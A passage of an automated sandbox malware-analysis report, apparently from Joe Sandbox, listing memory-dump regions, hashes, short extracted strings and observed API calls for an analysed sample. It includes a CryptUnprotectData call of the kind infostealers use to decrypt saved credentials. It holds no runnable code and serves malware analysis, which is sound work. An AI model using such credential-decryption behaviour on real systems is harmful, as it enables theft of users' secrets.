                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 9c85c4e11b598650d3489ae37ae6a15ad1b66d626e11e17461a5a9378c02c5c0
                                  • Instruction ID: 403d60acf32c8d53fe734b8edf8950218ebaa83ddec2ef5adbac8f54f14e1111
                                  • Opcode Fuzzy Hash: 9c85c4e11b598650d3489ae37ae6a15ad1b66d626e11e17461a5a9378c02c5c0
                                  • Instruction Fuzzy Hash: 8441EB70A00A1C9FDB14DB54CC55B9BB7B5AB48702F4082C8E618E72A0D7B16EC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007EA2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 007EA2F3
                                  • LocalFree.KERNEL32(?), ref: 007EA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 0f0c5cb8b73372eb2cec1ae0b561200d523098c8b934bc87158e7bd03708d0e2
                                  • Instruction ID: cfb60a16f8cba902d8df661963d6653b2725c8827bf4243d418a8cf24100ab69
                                  • Opcode Fuzzy Hash: 0f0c5cb8b73372eb2cec1ae0b561200d523098c8b934bc87158e7bd03708d0e2
                                  • Instruction Fuzzy Hash: 0D11F7B8A00209EFCB04DFA8D884AAEB7B5FF88300F104559ED15A7390D770AE51CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ;('~$~oU
                                  • API String ID: 0-366036938
                                  • Opcode ID: 1854da225b1ea1501523fd54fb7abd7d3ac9e8a8db208a70f6059799755644a9
                                  • Instruction ID: 161f4f022f285657a60d6998e7dc0674db64106af90b89626df5dd0d38a24549
                                  • Opcode Fuzzy Hash: 1854da225b1ea1501523fd54fb7abd7d3ac9e8a8db208a70f6059799755644a9
                                  • Instruction Fuzzy Hash: 76B238F3A0C2109FE304AE2DEC8567AFBE5EF94720F16453EEAC5C3744E93558048696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .|}$x
                                  • API String ID: 0-838600425
                                  • Opcode ID: cd6ad6d59e7df0ed13803bc7cf0f3b4daf6719df5930ba94bf1d9d906a8d875f
                                  • Instruction ID: 396a8fc5c3eb2561860fead174c5fc925d4cb0f40e7875800da2eb5d390bc290
                                  • Opcode Fuzzy Hash: cd6ad6d59e7df0ed13803bc7cf0f3b4daf6719df5930ba94bf1d9d906a8d875f
                                  • Instruction Fuzzy Hash: AEB216F360C2149FE304AE2DEC8567AFBE9EF94320F1A453DEAC4C7744EA3558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: 3fb4733484638f9ca7171a66c9ed0e0245ff1e7b5b609aa79861b86777660da2
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: E9724572908B509BC714CF18C8A066ABBE2FFD5316F598A1DFC95DB291D370DC498B82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: ec4fcbe2a22201370949457417b1a72f9fc891f3e8695a58efad722fd88983ac
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 9CA227B1C042689ADF18CB5CC8A13FDB7B1FF85300F1882AAD456BB281E7755E95CB91
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: f0b81fc4267b461fcbcecd25c317d9d5b1934a9e21d1104c9777592afaad3cb2
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: 35E1BD316087459FC724DE28C8907AEB7E2FFC9304F59492DE4D9DB291DA31A845CBC2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 731e463981a4a73ad97cd0905c3a1ecb15fd429ce5a6d3a1b4185bfd9d6016b8
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: 8FE1B131A083159FCB24CE18C8817AEB7E6FFC5314F15992DE99ADB251DB30EC458B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: UNC\
                                  • API String ID: 0-505053535
                                  • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction ID: 82af317c14c1a4fd365f6e8330ca181d5d254a74451a6af74c738ebd25886a8f
                                  • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                  • Instruction Fuzzy Hash: 03E14E71D0466D8FEB10CF18C8843BEBBE2FB95318F1A8169D4A4DB292D7758D46CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ~/'
                                  • API String ID: 0-1996814362
                                  • Opcode ID: e30d8734fe46028dd42bb8d14a0694442512ce8cdd4cb6c6e898b15b0ca90bb4
                                  • Instruction ID: 16a1c8b6fcc61a8d2ab65a5da138decf645c8b8aa7bbb0782a6d17dd633670bb
                                  • Opcode Fuzzy Hash: e30d8734fe46028dd42bb8d14a0694442512ce8cdd4cb6c6e898b15b0ca90bb4
                                  • Instruction Fuzzy Hash: 2F8129F3E082005BF3086E29DC9577ABAD5DB94321F1B463DDBC4877C4E97918018696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?o
                                  • API String ID: 0-3900432946
                                  • Opcode ID: 5c6677af9dfe8e831bfbe7410a54cdccf5b5ee5b876358cd3b40e888c582ec8e
                                  • Instruction ID: 7f5da385981c0bde8511eaf8c7667e15bfea7351b5a9947bec9bb1da01ebfdfd
                                  • Opcode Fuzzy Hash: 5c6677af9dfe8e831bfbe7410a54cdccf5b5ee5b876358cd3b40e888c582ec8e
                                  • Instruction Fuzzy Hash: 615147F3E082249BE310692DDC457AAB7DADB94730F1B463DEEC897784E5369C0182C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Js?
                                  • API String ID: 0-3827699304
                                  • Opcode ID: c25775bb14811b7a6d8cd760082c3561932ca366adb3760bd00ccdb8a4160bd9
                                  • Instruction ID: ba94e9a432d2ba58a6ca878e86a274f5eeae577832431e2f581c213277250515
                                  • Opcode Fuzzy Hash: c25775bb14811b7a6d8cd760082c3561932ca366adb3760bd00ccdb8a4160bd9
                                  • Instruction Fuzzy Hash: 1D4128F35082049FE714AE29EC41767B7D9EF94320F29852DEAC4C3790F939D805869A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
